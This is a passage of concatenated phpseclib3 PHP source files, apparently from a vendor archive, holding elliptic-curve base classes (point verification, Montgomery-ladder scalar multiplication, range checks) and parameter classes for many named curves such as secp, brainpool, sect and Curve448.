finite field elliptic curves is not supported'); } /** * Tests whether or not the x / y values satisfy the equation * * @return boolean */ public function verifyPoint(array $p) { list($x, $y) = $p; $lhs = $y->multiply($y); $lhs = $lhs->add($x->multiply($y)); $x2 = $x->multiply($x); $x3 = $x2->multiply($x); $rhs = $x3->add($this->a->multiply($x2))->add($this->b); return $lhs->equals($rhs); } /** * Returns the modulo * * @return \phpseclib3\Math\BigInteger */ public function getModulo() { return $this->modulo; } /** * Returns the a coefficient * * @return \phpseclib3\Math\PrimeField\Integer */ public function getA() { return $this->a; } /** * Returns the a coefficient * * @return \phpseclib3\Math\PrimeField\Integer */ public function getB() { return $this->b; } /** * Returns the affine point * * A Jacobian Coordinate is of the form (x, y, z). * To convert a Jacobian Coordinate to an Affine Point * you do (x / z^2, y / z^3) * * @return \phpseclib3\Math\PrimeField\Integer[] */ public function convertToAffine(array $p) { if (!isset($p[2])) { return $p; } list($x, $y, $z) = $p; $z = $this->one->divide($z); $z2 = $z->multiply($z); return [ $x->multiply($z2), $y->multiply($z2)->multiply($z) ]; } /** * Converts an affine point to a jacobian coordinate * * @return \phpseclib3\Math\PrimeField\Integer[] */ public function convertToInternal(array $p) { if (isset($p[2])) { return $p; } $p[2] = clone $this->one; $p['fresh'] = true; return $p; } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/EC/BaseCurves/Base.php000064400000011214147600400120022765 0ustar00 * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace phpseclib3\Crypt\EC\BaseCurves; use phpseclib3\Math\BigInteger; /** * Base * * @author Jim Wigginton */ abstract class Base { /** * The Order * * @var BigInteger */ protected $order; /** * Finite Field Integer factory * * @var \phpseclib3\Math\FiniteField\Integer */ protected $factory; /** * Returns a random integer * * @return object */ public function randomInteger() { return $this->factory->randomInteger(); } /** * Converts a BigInteger to a \phpseclib3\Math\FiniteField\Integer integer * * @return object */ public function convertInteger(BigInteger $x) { return $this->factory->newInteger($x); } /** * Returns the length, in bytes, of the modulo * * @return integer */ public function getLengthInBytes() { return $this->factory->getLengthInBytes(); } /** * Returns the length, in bits, of the modulo * * @return integer */ public function getLength() { return $this->factory->getLength(); } /** * Multiply a point on the curve by a scalar * * Uses the montgomery ladder technique as described here: * * https://en.wikipedia.org/wiki/Elliptic_curve_point_multiplication#Montgomery_ladder * https://github.com/phpecc/phpecc/issues/16#issuecomment-59176772 * * @return array */ public function multiplyPoint(array $p, BigInteger $d) { $alreadyInternal = isset($p[2]); $r = $alreadyInternal ? [[], $p] : [[], $this->convertToInternal($p)]; $d = $d->toBits(); for ($i = 0; $i < strlen($d); $i++) { $d_i = (int) $d[$i]; $r[1 - $d_i] = $this->addPoint($r[0], $r[1]); $r[$d_i] = $this->doublePoint($r[$d_i]); } return $alreadyInternal ? $r[0] : $this->convertToAffine($r[0]); } /** * Creates a random scalar multiplier * * @return BigInteger */ public function createRandomMultiplier() { static $one; if (!isset($one)) { $one = new BigInteger(1); } return BigInteger::randomRange($one, $this->order->subtract($one)); } /** * Performs range check */ public function rangeCheck(BigInteger $x) { static $zero; if (!isset($zero)) { $zero = new BigInteger(); } if (!isset($this->order)) { throw new \RuntimeException('setOrder needs to be called before this method'); } if ($x->compare($this->order) > 0 || $x->compare($zero) <= 0) { throw new \RangeException('x must be between 1 and the order of the curve'); } } /** * Sets the Order */ public function setOrder(BigInteger $order) { $this->order = $order; } /** * Returns the Order * * @return \phpseclib3\Math\BigInteger */ public function getOrder() { return $this->order; } /** * Use a custom defined modular reduction function * * @return object */ public function setReduction(callable $func) { $this->factory->setReduction($func); } /** * Returns the affine point * * @return object[] */ public function convertToAffine(array $p) { return $p; } /** * Converts an affine point to a jacobian coordinate * * @return object[] */ public function convertToInternal(array $p) { return $p; } /** * Negates a point * * @return object[] */ public function negatePoint(array $p) { $temp = [ $p[0], $p[1]->negate() ]; if (isset($p[2])) { $temp[] = $p[2]; } return $temp; } /** * Multiply and Add Points * * @return int[] */ public function multiplyAddPoints(array $points, array $scalars) { $p1 = $this->convertToInternal($points[0]); $p2 = $this->convertToInternal($points[1]); $p1 = $this->multiplyPoint($p1, $scalars[0]); $p2 = $this->multiplyPoint($p2, $scalars[1]); $r = $this->addPoint($p1, $p2); return $this->convertToAffine($r); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/prime239v1.php000064400000002205147600400120023141 0ustar00 * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace phpseclib3\Crypt\EC\Curves; use phpseclib3\Crypt\EC\BaseCurves\Prime; use phpseclib3\Math\BigInteger; class prime239v1 extends Prime { public function __construct() { $this->setModulo(new BigInteger('7FFFFFFFFFFFFFFFFFFFFFFF7FFFFFFFFFFF8000000000007FFFFFFFFFFF', 16)); $this->setCoefficients( new BigInteger('7FFFFFFFFFFFFFFFFFFFFFFF7FFFFFFFFFFF8000000000007FFFFFFFFFFC', 16), new BigInteger('6B016C3BDCF18941D0D654921475CA71A9DB2FB27D1D37796185C2942C0A', 16) ); $this->setBasePoint( new BigInteger('0FFA963CDCA8816CCC33B8642BEDF905C3D358573D3F27FBBD3B3CB9AAAF', 16), new BigInteger('7DEBE8E4E90A5DAE6E4054CA530BA04654B36818CE226B39FCCB7B02F1AE', 16) ); $this->setOrder(new BigInteger('7FFFFFFFFFFFFFFFFFFFFFFF7FFFFF9E5E9A9F5D9071FBD1522688909D0B', 16)); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/brainpoolP320t1.php000064400000002752147600400120024126 0ustar00 * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace phpseclib3\Crypt\EC\Curves; use phpseclib3\Crypt\EC\BaseCurves\Prime; use phpseclib3\Math\BigInteger; class brainpoolP320t1 extends Prime { public function __construct() { $this->setModulo(new BigInteger('D35E472036BC4FB7E13C785ED201E065F98FCFA6F6F40DEF4F9' . '2B9EC7893EC28FCD412B1F1B32E27', 16)); $this->setCoefficients( new BigInteger('D35E472036BC4FB7E13C785ED201E065F98FCFA6F6F40DEF4F92B9EC7893EC28' . 'FCD412B1F1B32E24', 16), // eg. -3 new BigInteger('A7F561E038EB1ED560B3D147DB782013064C19F27ED27C6780AAF77FB8A547CE' . 'B5B4FEF422340353', 16) ); $this->setBasePoint( new BigInteger('925BE9FB01AFC6FB4D3E7D4990010F813408AB106C4F09CB7EE07868CC136FFF' . '3357F624A21BED52', 16), new BigInteger('63BA3A7A27483EBF6671DBEF7ABB30EBEE084E58A0B077AD42A5A0989D1EE71B' . '1B9BC0455FB0D2C3', 16) ); $this->setOrder(new BigInteger('D35E472036BC4FB7E13C785ED201E065F98FCFA5B68F12A32D4' . '82EC7EE8658E98691555B44C59311', 16)); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/prime192v3.php000064400000002075147600400120023146 0ustar00 * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace phpseclib3\Crypt\EC\Curves; use phpseclib3\Crypt\EC\BaseCurves\Prime; use phpseclib3\Math\BigInteger; class prime192v3 extends Prime { public function __construct() { $this->setModulo(new BigInteger('FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEFFFFFFFFFFFFFFFF', 16)); $this->setCoefficients( new BigInteger('FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEFFFFFFFFFFFFFFFC', 16), new BigInteger('22123DC2395A05CAA7423DAECCC94760A7D462256BD56916', 16) ); $this->setBasePoint( new BigInteger('7D29778100C65A1DA1783716588DCE2B8B4AEE8E228F1896', 16), new BigInteger('38A90F22637337334B49DCB66A6DC8F9978ACA7648A943B0', 16) ); $this->setOrder(new BigInteger('FFFFFFFFFFFFFFFFFFFFFFFF7A62D031C83F4294F640EC13', 16)); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/nistk163.php000064400000000546147600400120022710 0ustar00 * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace phpseclib3\Crypt\EC\Curves; final class nistk163 extends sect163k1 { } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/secp224k1.php000064400000003210147600400120022733 0ustar00 * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace phpseclib3\Crypt\EC\Curves; use phpseclib3\Crypt\EC\BaseCurves\KoblitzPrime; use phpseclib3\Math\BigInteger; class secp224k1 extends KoblitzPrime { public function __construct() { $this->setModulo(new BigInteger('FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEFFFFE56D', 16)); $this->setCoefficients( new BigInteger('00000000000000000000000000000000000000000000000000000000', 16), new BigInteger('00000000000000000000000000000000000000000000000000000005', 16) ); $this->setBasePoint( new BigInteger('A1455B334DF099DF30FC28A169A467E9E47075A90F7E650EB6B7A45C', 16), new BigInteger('7E089FED7FBA344282CAFBD6F7E319F7C0B0BD59E2CA4BDB556D61A5', 16) ); $this->setOrder(new BigInteger('010000000000000000000000000001DCE8D2EC6184CAF0A971769FB1F7', 16)); $this->basis = []; $this->basis[] = [ 'a' => new BigInteger('00B8ADF1378A6EB73409FA6C9C637D', -16), 'b' => new BigInteger('94730F82B358A3776A826298FA6F', -16) ]; $this->basis[] = [ 'a' => new BigInteger('01DCE8D2EC6184CAF0A972769FCC8B', -16), 'b' => new BigInteger('4D2100BA3DC75AAB747CCF355DEC', -16) ]; $this->beta = $this->factory->newInteger(new BigInteger('01F178FFA4B17C89E6F73AECE2AAD57AF4C0A748B63C830947B27E04', -16)); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/brainpoolP384t1.php000064400000003343147600400120024135 0ustar00 * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace phpseclib3\Crypt\EC\Curves; use phpseclib3\Crypt\EC\BaseCurves\Prime; use phpseclib3\Math\BigInteger; class brainpoolP384t1 extends Prime { public function __construct() { $this->setModulo(new BigInteger( '8CB91E82A3386D280F5D6F7E50E641DF152F7109ED5456B412B1DA197FB71123ACD3A729901D1A7' . '1874700133107EC53', 16 )); $this->setCoefficients( new BigInteger( '8CB91E82A3386D280F5D6F7E50E641DF152F7109ED5456B412B1DA197FB71123ACD3A729901' . 'D1A71874700133107EC50', 16 ), // eg. -3 new BigInteger( '7F519EADA7BDA81BD826DBA647910F8C4B9346ED8CCDC64E4B1ABD11756DCE1D2074AA263B8' . '8805CED70355A33B471EE', 16 ) ); $this->setBasePoint( new BigInteger( '18DE98B02DB9A306F2AFCD7235F72A819B80AB12EBD653172476FECD462AABFFC4FF191B946' . 'A5F54D8D0AA2F418808CC', 16 ), new BigInteger( '25AB056962D30651A114AFD2755AD336747F93475B7A1FCA3B88F2B6A208CCFE469408584DC' . '2B2912675BF5B9E582928', 16 ) ); $this->setOrder(new BigInteger( '8CB91E82A3386D280F5D6F7E50E641DF152F7109ED5456B31F166E6CAC0425A7CF3AB6AF6B7FC31' . '03B883202E9046565', 16 )); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/sect193r1.php000064400000001673147600400120022766 0ustar00 * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace phpseclib3\Crypt\EC\Curves; use phpseclib3\Crypt\EC\BaseCurves\Binary; use phpseclib3\Math\BigInteger; class sect193r1 extends Binary { public function __construct() { $this->setModulo(193, 15, 0); $this->setCoefficients( '0017858FEB7A98975169E171F77B4087DE098AC8A911DF7B01', '00FDFB49BFE6C3A89FACADAA7A1E5BBC7CC1C2E5D831478814' ); $this->setBasePoint( '01F481BC5F0FF84A74AD6CDF6FDEF4BF6179625372D8C0C5E1', '0025E399F2903712CCF3EA9E3A1AD17FB0B3201B6AF7CE1B05' ); $this->setOrder(new BigInteger('01000000000000000000000000C7F34A778F443ACC920EBA49', 16)); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/secp192k1.php000064400000003076147600400120022751 0ustar00 * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace phpseclib3\Crypt\EC\Curves; use phpseclib3\Crypt\EC\BaseCurves\KoblitzPrime; use phpseclib3\Math\BigInteger; class secp192k1 extends KoblitzPrime { public function __construct() { $this->setModulo(new BigInteger('FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEFFFFEE37', 16)); $this->setCoefficients( new BigInteger('000000000000000000000000000000000000000000000000', 16), new BigInteger('000000000000000000000000000000000000000000000003', 16) ); $this->setBasePoint( new BigInteger('DB4FF10EC057E9AE26B07D0280B7F4341DA5D1B1EAE06C7D', 16), new BigInteger('9B2F2F6D9C5628A7844163D015BE86344082AA88D95E2F9D', 16) ); $this->setOrder(new BigInteger('FFFFFFFFFFFFFFFFFFFFFFFE26F2FC170F69466A74DEFD8D', 16)); $this->basis = []; $this->basis[] = [ 'a' => new BigInteger('00B3FB3400DEC5C4ADCEB8655C', -16), 'b' => new BigInteger('8EE96418CCF4CFC7124FDA0F', -16) ]; $this->basis[] = [ 'a' => new BigInteger('01D90D03E8F096B9948B20F0A9', -16), 'b' => new BigInteger('42E49819ABBA9474E1083F6B', -16) ]; $this->beta = $this->factory->newInteger(new BigInteger('447A96E6C647963E2F7809FEAAB46947F34B0AA3CA0BBA74', -16)); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/secp112r2.php000064400000001747147600400120022754 0ustar00 * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace phpseclib3\Crypt\EC\Curves; use phpseclib3\Crypt\EC\BaseCurves\Prime; use phpseclib3\Math\BigInteger; class secp112r2 extends Prime { public function __construct() { // same modulo as secp112r1 $this->setModulo(new BigInteger('DB7C2ABF62E35E668076BEAD208B', 16)); $this->setCoefficients( new BigInteger('6127C24C05F38A0AAAF65C0EF02C', 16), new BigInteger('51DEF1815DB5ED74FCC34C85D709', 16) ); $this->setBasePoint( new BigInteger('4BA30AB5E892B4E1649DD0928643', 16), new BigInteger('ADCD46F5882E3747DEF36E956E97', 16) ); $this->setOrder(new BigInteger('36DF0AAFD8B8D7597CA10520D04B', 16)); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/secp160k1.php000064400000003027147600400120022740 0ustar00 * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace phpseclib3\Crypt\EC\Curves; use phpseclib3\Crypt\EC\BaseCurves\KoblitzPrime; use phpseclib3\Math\BigInteger; class secp160k1 extends KoblitzPrime { public function __construct() { // same as secp160r2 $this->setModulo(new BigInteger('FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEFFFFAC73', 16)); $this->setCoefficients( new BigInteger('0000000000000000000000000000000000000000', 16), new BigInteger('0000000000000000000000000000000000000007', 16) ); $this->setBasePoint( new BigInteger('3B4C382CE37AA192A4019E763036F4F5DD4D7EBB', 16), new BigInteger('938CF935318FDCED6BC28286531733C3F03C4FEE', 16) ); $this->setOrder(new BigInteger('0100000000000000000001B8FA16DFAB9ACA16B6B3', 16)); $this->basis = []; $this->basis[] = [ 'a' => new BigInteger('0096341F1138933BC2F505', -16), 'b' => new BigInteger('FF6E9D0418C67BB8D5F562', -16) ]; $this->basis[] = [ 'a' => new BigInteger('01BDCB3A09AAAABEAFF4A8', -16), 'b' => new BigInteger('04D12329FF0EF498EA67', -16) ]; $this->beta = $this->factory->newInteger(new BigInteger('645B7345A143464942CC46D7CF4D5D1E1E6CBB68', -16)); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/brainpoolP224t1.php000064400000002201147600400120024116 0ustar00 * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace phpseclib3\Crypt\EC\Curves; use phpseclib3\Crypt\EC\BaseCurves\Prime; use phpseclib3\Math\BigInteger; class brainpoolP224t1 extends Prime { public function __construct() { $this->setModulo(new BigInteger('D7C134AA264366862A18302575D1D787B09F075797DA89F57EC8C0FF', 16)); $this->setCoefficients( new BigInteger('D7C134AA264366862A18302575D1D787B09F075797DA89F57EC8C0FC', 16), // eg. -3 new BigInteger('4B337D934104CD7BEF271BF60CED1ED20DA14C08B3BB64F18A60888D', 16) ); $this->setBasePoint( new BigInteger('6AB1E344CE25FF3896424E7FFE14762ECB49F8928AC0C76029B4D580', 16), new BigInteger('0374E9F5143E568CD23F3F4D7C0D4B1E41C8CC0D1C6ABD5F1A46DB4C', 16) ); $this->setOrder(new BigInteger('D7C134AA264366862A18302575D0FB98D116BC4B6DDEBCA3A5A7939F', 16)); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/brainpoolP384r1.php000064400000003330147600400120024127 0ustar00 * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace phpseclib3\Crypt\EC\Curves; use phpseclib3\Crypt\EC\BaseCurves\Prime; use phpseclib3\Math\BigInteger; class brainpoolP384r1 extends Prime { public function __construct() { $this->setModulo(new BigInteger( '8CB91E82A3386D280F5D6F7E50E641DF152F7109ED5456B412B1DA197FB71123ACD3A729901D1A7' . '1874700133107EC53', 16 )); $this->setCoefficients( new BigInteger( '7BC382C63D8C150C3C72080ACE05AFA0C2BEA28E4FB22787139165EFBA91F90F8AA5814A503' . 'AD4EB04A8C7DD22CE2826', 16 ), new BigInteger( '4A8C7DD22CE28268B39B55416F0447C2FB77DE107DCD2A62E880EA53EEB62D57CB4390295DB' . 'C9943AB78696FA504C11', 16 ) ); $this->setBasePoint( new BigInteger( '1D1C64F068CF45FFA2A63A81B7C13F6B8847A3E77EF14FE3DB7FCAFE0CBD10E8E826E03436D' . '646AAEF87B2E247D4AF1E', 16 ), new BigInteger( '8ABE1D7520F9C2A45CB1EB8E95CFD55262B70B29FEEC5864E19C054FF99129280E464621779' . '1811142820341263C5315', 16 ) ); $this->setOrder(new BigInteger( '8CB91E82A3386D280F5D6F7E50E641DF152F7109ED5456B31F166E6CAC0425A7CF3AB6AF6B7FC31' . '03B883202E9046565', 16 )); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/nistk409.php000064400000000546147600400120022713 0ustar00 * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace phpseclib3\Crypt\EC\Curves; final class nistk409 extends sect409k1 { } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/prime239v3.php000064400000002205147600400120023143 0ustar00 * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace phpseclib3\Crypt\EC\Curves; use phpseclib3\Crypt\EC\BaseCurves\Prime; use phpseclib3\Math\BigInteger; class prime239v3 extends Prime { public function __construct() { $this->setModulo(new BigInteger('7FFFFFFFFFFFFFFFFFFFFFFF7FFFFFFFFFFF8000000000007FFFFFFFFFFF', 16)); $this->setCoefficients( new BigInteger('7FFFFFFFFFFFFFFFFFFFFFFF7FFFFFFFFFFF8000000000007FFFFFFFFFFC', 16), new BigInteger('255705FA2A306654B1F4CB03D6A750A30C250102D4988717D9BA15AB6D3E', 16) ); $this->setBasePoint( new BigInteger('6768AE8E18BB92CFCF005C949AA2C6D94853D0E660BBF854B1C9505FE95A', 16), new BigInteger('1607E6898F390C06BC1D552BAD226F3B6FCFE48B6E818499AF18E3ED6CF3', 16) ); $this->setOrder(new BigInteger('7FFFFFFFFFFFFFFFFFFFFFFF7FFFFF975DEB41B3A6057C3C432146526551', 16)); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/brainpoolP224r1.php000064400000002167147600400120024127 0ustar00 * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace phpseclib3\Crypt\EC\Curves; use phpseclib3\Crypt\EC\BaseCurves\Prime; use phpseclib3\Math\BigInteger; class brainpoolP224r1 extends Prime { public function __construct() { $this->setModulo(new BigInteger('D7C134AA264366862A18302575D1D787B09F075797DA89F57EC8C0FF', 16)); $this->setCoefficients( new BigInteger('68A5E62CA9CE6C1C299803A6C1530B514E182AD8B0042A59CAD29F43', 16), new BigInteger('2580F63CCFE44138870713B1A92369E33E2135D266DBB372386C400B', 16) ); $this->setBasePoint( new BigInteger('0D9029AD2C7E5CF4340823B2A87DC68C9E4CE3174C1E6EFDEE12C07D', 16), new BigInteger('58AA56F772C0726F24C6B89E4ECDAC24354B9E99CAA3F6D3761402CD', 16) ); $this->setOrder(new BigInteger('D7C134AA264366862A18302575D0FB98D116BC4B6DDEBCA3A5A7939F', 16)); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/sect233k1.php000064400000001753147600400120022751 0ustar00 * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace phpseclib3\Crypt\EC\Curves; use phpseclib3\Crypt\EC\BaseCurves\Binary; use phpseclib3\Math\BigInteger; class sect233k1 extends Binary { public function __construct() { $this->setModulo(233, 74, 0); $this->setCoefficients( '000000000000000000000000000000000000000000000000000000000000', '000000000000000000000000000000000000000000000000000000000001' ); $this->setBasePoint( '017232BA853A7E731AF129F22FF4149563A419C26BF50A4C9D6EEFAD6126', '01DB537DECE819B7F70F555A67C427A8CD9BF18AEB9B56E0C11056FAE6A3' ); $this->setOrder(new BigInteger('8000000000000000000000000000069D5BB915BCD46EFB1AD5F173ABDF', 16)); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/brainpoolP256t1.php000064400000002261147600400120024131 0ustar00 * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace phpseclib3\Crypt\EC\Curves; use phpseclib3\Crypt\EC\BaseCurves\Prime; use phpseclib3\Math\BigInteger; class brainpoolP256t1 extends Prime { public function __construct() { $this->setModulo(new BigInteger('A9FB57DBA1EEA9BC3E660A909D838D726E3BF623D52620282013481D1F6E5377', 16)); $this->setCoefficients( new BigInteger('A9FB57DBA1EEA9BC3E660A909D838D726E3BF623D52620282013481D1F6E5374', 16), // eg. -3 new BigInteger('662C61C430D84EA4FE66A7733D0B76B7BF93EBC4AF2F49256AE58101FEE92B04', 16) ); $this->setBasePoint( new BigInteger('A3E8EB3CC1CFE7B7732213B23A656149AFA142C47AAFBC2B79A191562E1305F4', 16), new BigInteger('2D996C823439C56D7F7B22E14644417E69BCB6DE39D027001DABE8F35B25C9BE', 16) ); $this->setOrder(new BigInteger('A9FB57DBA1EEA9BC3E660A909D838D718C397AA3B561A6F7901E0E82974856A7', 16)); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/sect409r1.php000064400000002376147600400120022767 0ustar00 * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace phpseclib3\Crypt\EC\Curves; use phpseclib3\Crypt\EC\BaseCurves\Binary; use phpseclib3\Math\BigInteger; class sect409r1 extends Binary { public function __construct() { $this->setModulo(409, 87, 0); $this->setCoefficients( '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001', '0021A5C2C8EE9FEB5C4B9A753B7B476B7FD6422EF1F3DD674761FA99D6AC27C8A9A197B272822F6CD57A55AA4F50AE317B13545F' ); $this->setBasePoint( '015D4860D088DDB3496B0C6064756260441CDE4AF1771D4DB01FFE5B34E59703DC255A868A1180515603AEAB60794E54BB7996A7', '0061B1CFAB6BE5F32BBFA78324ED106A7636B9C5A7BD198D0158AA4F5488D08F38514F1FDF4B4F40D2181B3681C364BA0273C706' ); $this->setOrder(new BigInteger( '010000000000000000000000000000000000000000000000000001E2' . 'AAD6A612F33307BE5FA47C3C9E052F838164CD37D9A21173', 16 )); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/nistp384.php000064400000000546147600400120022722 0ustar00 * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace phpseclib3\Crypt\EC\Curves; final class nistp384 extends secp384r1 { } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/prime192v1.php000064400000000552147600400120023142 0ustar00 * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace phpseclib3\Crypt\EC\Curves; final class prime192v1 extends secp192r1 { } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/sect131r2.php000064400000001560147600400120022752 0ustar00 * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace phpseclib3\Crypt\EC\Curves; use phpseclib3\Crypt\EC\BaseCurves\Binary; use phpseclib3\Math\BigInteger; class sect131r2 extends Binary { public function __construct() { $this->setModulo(131, 8, 3, 2, 0); $this->setCoefficients( '03E5A88919D7CAFCBF415F07C2176573B2', '04B8266A46C55657AC734CE38F018F2192' ); $this->setBasePoint( '0356DCD8F2F95031AD652D23951BB366A8', '0648F06D867940A5366D9E265DE9EB240F' ); $this->setOrder(new BigInteger('0400000000000000016954A233049BA98F', 16)); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/Curve448.php000064400000005107147600400120022650 0ustar00 * @copyright 2019 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace phpseclib3\Crypt\EC\Curves; use phpseclib3\Crypt\EC\BaseCurves\Montgomery; use phpseclib3\Math\BigInteger; class Curve448 extends Montgomery { public function __construct() { // 2^448 - 2^224 - 1 $this->setModulo(new BigInteger( 'FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFE' . 'FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF', 16 )); $this->a24 = $this->factory->newInteger(new BigInteger('39081')); $this->p = [$this->factory->newInteger(new BigInteger(5))]; // 2^446 - 0x8335dc163bb124b65129c96fde933d8d723a70aadc873d6d54a7bb0d $this->setOrder(new BigInteger( '3FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF' . '7CCA23E9C44EDB49AED63690216CC2728DC58F552378C292AB5844F3', 16 )); /* $this->setCoefficients( new BigInteger('156326'), // a ); $this->setBasePoint( new BigInteger(5), new BigInteger( '355293926785568175264127502063783334808976399387714271831880898' . '435169088786967410002932673765864550910142774147268105838985595290' . '606362') ); */ } /** * Multiply a point on the curve by a scalar * * Modifies the scalar as described at https://tools.ietf.org/html/rfc7748#page-8 * * @return array */ public function multiplyPoint(array $p, BigInteger $d) { //$r = strrev(sodium_crypto_scalarmult($d->toBytes(), strrev($p[0]->toBytes()))); //return [$this->factory->newInteger(new BigInteger($r, 256))]; $d = $d->toBytes(); $d[0] = $d[0] & "\xFC"; $d = strrev($d); $d |= "\x80"; $d = new BigInteger($d, 256); return parent::multiplyPoint($p, $d); } /** * Creates a random scalar multiplier * * @return BigInteger */ public function createRandomMultiplier() { return BigInteger::random(446); } /** * Performs range check */ public function rangeCheck(BigInteger $x) { if ($x->getLength() > 448 || $x->isNegative()) { throw new \RangeException('x must be a positive integer less than 446 bytes in length'); } } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/brainpoolP512r1.php000064400000003631147600400120024124 0ustar00 * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace phpseclib3\Crypt\EC\Curves; use phpseclib3\Crypt\EC\BaseCurves\Prime; use phpseclib3\Math\BigInteger; class brainpoolP512r1 extends Prime { public function __construct() { $this->setModulo(new BigInteger( 'AADD9DB8DBE9C48B3FD4E6AE33C9FC07CB308DB3B3C9D20ED6639CCA703308717D4D9B009BC' . '66842AECDA12AE6A380E62881FF2F2D82C68528AA6056583A48F3', 16 )); $this->setCoefficients( new BigInteger( '7830A3318B603B89E2327145AC234CC594CBDD8D3DF91610A83441CAEA9863BC2DED5D5AA82' . '53AA10A2EF1C98B9AC8B57F1117A72BF2C7B9E7C1AC4D77FC94CA', 16 ), new BigInteger( '3DF91610A83441CAEA9863BC2DED5D5AA8253AA10A2EF1C98B9AC8B57F1117A72BF2C7B9E7C' . '1AC4D77FC94CADC083E67984050B75EBAE5DD2809BD638016F723', 16 ) ); $this->setBasePoint( new BigInteger( '81AEE4BDD82ED9645A21322E9C4C6A9385ED9F70B5D916C1B43B62EEF4D0098EFF3B1F78E2D' . '0D48D50D1687B93B97D5F7C6D5047406A5E688B352209BCB9F822', 16 ), new 